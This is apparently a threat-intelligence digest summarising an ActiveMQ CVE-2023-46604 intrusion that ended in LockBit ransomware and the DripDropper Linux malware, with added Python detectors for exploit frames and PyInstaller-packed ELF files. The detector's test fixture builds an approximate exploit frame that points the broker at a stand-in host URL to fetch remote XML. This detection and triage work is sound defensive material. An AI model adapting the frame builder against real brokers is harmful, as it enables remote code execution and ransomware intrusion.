Apache ActiveMQ Exploit Leads to LockBit Ransomware - The DFIR Report

Key Takeaways

This intrusion began in mid-February 2024 after a threat actor exploited a vulnerability (CVE-2023-46604) on an exposed Apache ActiveMQ server. The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring […]

The DFIR Report
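The takeaway above says the RCE came from CVE-2023-46604 plus a "Java Spring class". The added example below is not from The DFIR Report; it is a small network-capture triage check written here. It assumes the widely published exploitation pattern for this CVE: an OpenWire ExceptionResponse frame (command type 31) whose Throwable class name is a Spring XML application-context class and whose message is a URL the broker then fetches. The sample frame it scans is constructed for the test and only approximates the public PoC layout; the detector itself is lenient (class name followed by a URL) so it still fires on partial or oddly framed captures.

```python
"""Flag OpenWire frames carrying the CVE-2023-46604 exploitation pattern.

Added example, not code from The DFIR Report. Assumptions: the attacker frame
is an OpenWire ExceptionResponse (type 31) naming a Spring XML context class
and a remote URL; everything below that describes byte layout is an
approximation used only to build a constructed test fixture.
"""
import re
import struct
from typing import Optional

EXCEPTION_RESPONSE_TYPE = 31  # OpenWire command type byte for ExceptionResponse

# Spring classes named in public analyses of CVE-2023-46604: their constructor
# takes a configuration location, which the broker then loads and evaluates.
SPRING_XML_CONTEXT_CLASSES = (
    b"org.springframework.context.support.ClassPathXmlApplicationContext",
    b"org.springframework.context.support.FileSystemXmlApplicationContext",
)
URL_RE = re.compile(rb"(?:https?|ftp|file)://[\x21-\x7e]{1,2048}")


def find_cve_2023_46604_indicators(payload: bytes) -> Optional[dict]:
    """Return indicator details if PAYLOAD looks like an exploitation attempt.

    PAYLOAD is one raw OpenWire frame as sent to the broker (4-byte big-endian
    length, then the command type byte, then the body). The check is lenient:
    it matches on the class name plus a URL appearing after it and records
    whether the frame type was an ExceptionResponse, so a truncated capture
    still surfaces and the frame type becomes a confidence hint.
    """
    if len(payload) < 5:
        return None
    frame_type = payload[4]
    for cls in SPRING_XML_CONTEXT_CLASSES:
        idx = payload.find(cls)
        if idx == -1:
            continue
        m = URL_RE.search(payload, idx + len(cls))
        return {
            "class": cls.decode(),
            "url": m.group(0).decode(errors="replace") if m else None,
            "exception_response_frame": frame_type == EXCEPTION_RESPONSE_TYPE,
        }
    return None


def _utf_field(s: bytes) -> bytes:
    """Non-null string field: presence marker, 2-byte length, bytes (approximation)."""
    return b"\x01" + struct.pack(">H", len(s)) + s


def build_sample_exception_response(class_name: bytes, message: bytes) -> bytes:
    """CONSTRUCTED test fixture approximating the public PoC frame layout:
    commandId, responseRequired, correlationId, then the Throwable's class name
    and message. Only the field order matters to the detector; no broker
    handshake is performed and this is not a working exploit."""
    body = bytes([EXCEPTION_RESPONSE_TYPE])
    body += struct.pack(">I", 0)   # commandId
    body += b"\x00"                # responseRequired
    body += struct.pack(">I", 0)   # correlationId
    body += b"\x01"                # Throwable present
    body += _utf_field(class_name)
    body += _utf_field(message)
    return struct.pack(">I", len(body)) + body


# CONSTRUCTED benign frame: a WireFormatInfo-style handshake (type 1) with
# filler bytes; it must not trigger the detector.
BENIGN_FRAME = struct.pack(">I", 12) + bytes([1]) + b"ActiveMQ" + b"\x00\x00\x00"


def scan_frames(frames) -> list:
    """Run the detector over an iterable of frames and return the hits."""
    hits = []
    for i, frame in enumerate(frames):
        hit = find_cve_2023_46604_indicators(frame)
        if hit:
            hits.append({"frame_index": i, **hit})
    return hits


if __name__ == "__main__":
    sample = build_sample_exception_response(
        SPRING_XML_CONTEXT_CLASSES[0], b"http://203.0.113.10/poc.xml")
    for hit in scan_frames([BENIGN_FRAME, sample]):
        print(hit)
```

Feed it the TCP payloads from port 61616 (or whatever the broker listens on) split at the 4-byte length prefix; a hit with `exception_response_frame` true and a URL pointing off-network is the pattern to escalate on, and the URL is the next thing to pull for the hosted XML.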
Patching for persistence: How DripDropper Linux malware moves through the cloud
#DripDropper #CVE_2023_46604
https://redcanary.com/blog/threat-intelligence/dripdropper-linux-malware/

DripDropper is the name Red Canary gave to a Linux malware variant that uses an encrypted PyInstaller ELF file to communicate with a Dropbox account.

Red Canary
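The card above describes the sample as an encrypted PyInstaller ELF. The added example below is not Red Canary's code; it is a host-triage check written here that decides whether an ELF on disk was built with PyInstaller by locating the CArchive cookie (magic `MEI\x0c\x0b\x0a\x0b\x0e`) and reading the Python version out of it. The bytecode-encryption hint is an assumption: it looks for PyInstaller's own `pyimod00_crypto_key` module name, which PyInstaller 3.x to 5.x builds with `--key` leave in the archive table of contents, and says nothing about any other packing or encryption layer a sample may carry. The ELF fixture it scans is constructed for the test.

```python
"""Triage: is this ELF a PyInstaller bundle, and which Python did it embed?

Added example, not Red Canary's code. The cookie magic and layout are
PyInstaller's; the encryption heuristic is an assumption limited to
PyInstaller's built-in --key bytecode encryption (3.x to 5.x builds).
"""
import struct
import sys
from typing import Optional

ELF_MAGIC = b"\x7fELF"
PYI_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"   # PyInstaller CArchive cookie magic
PYI_COOKIE_FMT = "!8sIIii64s"                   # magic, pkg len, TOC off, TOC len, pyvers, pylib
PYI_COOKIE_LEN = struct.calcsize(PYI_COOKIE_FMT)
PYI_CRYPTO_MODULE = b"pyimod00_crypto_key"       # assumption: marker of --key builds


def triage_pyinstaller_elf(data: bytes) -> Optional[dict]:
    """Return bundle details if DATA is a PyInstaller-built ELF, else None.

    The bootloader binary itself contains the cookie magic (it searches for
    it at run time), so the LAST occurrence is taken: the real cookie sits at
    the end of the appended archive, after the bootloader code.
    """
    if not data.startswith(ELF_MAGIC):
        return None
    idx = data.rfind(PYI_COOKIE_MAGIC)
    if idx == -1:
        return None
    result = {
        "pyinstaller": True,
        "python_version": None,
        "package_len": None,
        "bytecode_encrypted": PYI_CRYPTO_MODULE in data,
    }
    cookie = data[idx: idx + PYI_COOKIE_LEN]
    if len(cookie) == PYI_COOKIE_LEN:
        _magic, pkg_len, _toc_off, _toc_len, pyvers, _pylib = struct.unpack(
            PYI_COOKIE_FMT, cookie)
        # pyvers is major*100 + minor, e.g. 311 for Python 3.11
        result["python_version"] = f"{pyvers // 100}.{pyvers % 100}"
        result["package_len"] = pkg_len
    return result


def build_sample_pyinstaller_elf(pyvers: int, encrypted: bool) -> bytes:
    """CONSTRUCTED fixture: ELF magic, a fake bootloader that (like real ones)
    contains the cookie magic in its code, a fake TOC, then the trailing cookie."""
    bootloader = ELF_MAGIC + b"\x00" * 60 + PYI_COOKIE_MAGIC + b"\x90" * 32
    toc = b"fake-toc:" + (PYI_CRYPTO_MODULE if encrypted else b"main") + b"\x00"
    cookie = struct.pack(PYI_COOKIE_FMT, PYI_COOKIE_MAGIC,
                         len(toc) + PYI_COOKIE_LEN, 0, len(toc), pyvers,
                         b"libpython3.so")
    return bootloader + toc + cookie


def triage_path(path: str) -> Optional[dict]:
    """Read a file and run the triage; small helper for scanning a host."""
    with open(path, "rb") as fh:
        return triage_pyinstaller_elf(fh.read())


if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        print(triage_pyinstaller_elf(build_sample_pyinstaller_elf(311, True)))
    for p in targets:
        print(p, triage_path(p))
```

Run it over the usual drop locations (`/tmp`, `/var/tmp`, `/dev/shm`, service users' home directories); a PyInstaller ELF owned by a broker or web-app service account is worth a closer look regardless of what the cookie says, and a reported Python version newer than anything installed on the box is a cheap extra tell that the binary was built elsewhere.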